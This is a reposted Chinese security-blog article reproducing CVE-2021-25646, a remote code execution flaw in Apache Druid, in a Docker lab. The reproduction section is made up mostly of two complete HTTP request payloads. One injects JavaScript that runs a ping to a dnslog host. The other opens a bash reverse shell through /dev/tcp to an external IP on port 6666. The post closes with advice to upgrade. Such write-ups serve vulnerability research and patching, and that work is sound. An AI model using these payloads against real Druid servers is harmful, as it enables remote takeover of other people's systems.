【CVE-2021-25646 | 附PoC】Apache Druid 远程代码执行漏洞

Khan安全团队

发布于 2021-03-10 15:55:57

3.3K0

发布于 2021-03-10 15:55:57

文章被收录于专栏：Khan安全团队Khan安全团队

0x01 简介

Apache Druid是美国阿帕奇软件（Apache）基金会的一款使用Java语言编写的、面向列的开源分布式数据库。

Apache Druid 0.20.0和更早的版本存在访问控制错误漏洞，该漏洞允许经过身份验证的用户强制Druid运行用户提供的JavaScript代码，并执行服务器进程特权的代码。

0x02 环境搭建

直接docker拉取环境

docker pull fokkodriesprong/docker-druid #拉取镜像
docker run --rm -i -p 8888:8888  fokkodriesprong/docker-druid #启动镜像

环境搭建成功访问是这个酱紫

http://192.168.46.131:8888

脚本检测（萌新写的太烂就不放出来了

）

0x03 漏洞复现

这里利用DNSlog检测是否可以执行命令，附上PoC：

POST /druid/indexer/v1/sampler?for=filter HTTP/1.1
Host: 192.168.46.131:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 556
Origin: http://192.168.46.131:8888
Connection: close
Referer: http://192.168.46.131:8888/unified-console.html

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"/opt/","filter":""}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('ping ylqm00.dnslog.cn')}",
"dimension":"added",
"":{
"enabled":"true"
}
}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}

反弹shell（直接将ping命令换成反弹shell的命令就可以）

POST /druid/indexer/v1/sampler?for=filter HTTP/1.1
Host: 192.168.46.131:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 606
Origin: http://192.168.46.131:8888
Connection: close
Referer: http://192.168.46.131:8888/unified-console.html

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"/opt/","filter":""}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/138.128.214.57/6666 0>&1')}",
"dimension":"added",
"":{
"enabled":"true"
}
}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}

直接上图

填写目录

quickstart/tutorial/
wikiticker-2015-09-12-sampled.json.gz

开启代理抓包修改数据

反弹shell成功

0x04 安全建议

建议广大用户及时更新Apache Druid，下载链接为：

https://druid.apache.org/downloads.html
https://github.com/apache/druid/releases/tag/druid-0.20.1

本文参与腾讯云自媒体同步曝光计划，分享自微信公众号。

原始发表：2021-02-05，如有侵权请联系 cloudcommunity@tencent.com 删除

apache

本文分享自 Khan安全团队微信公众号，前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体同步曝光计划，欢迎热爱写作的你一起参与！

登录后参与评论

0 条评论

热度

【CVE-2021-25646 | 附PoC】Apache Druid 远程代码执行漏洞

【CVE-2021-25646 | 附PoC】Apache Druid 远程代码执行漏洞

社区

活动

资源

关于

腾讯云开发者

热门产品

热门推荐

更多推荐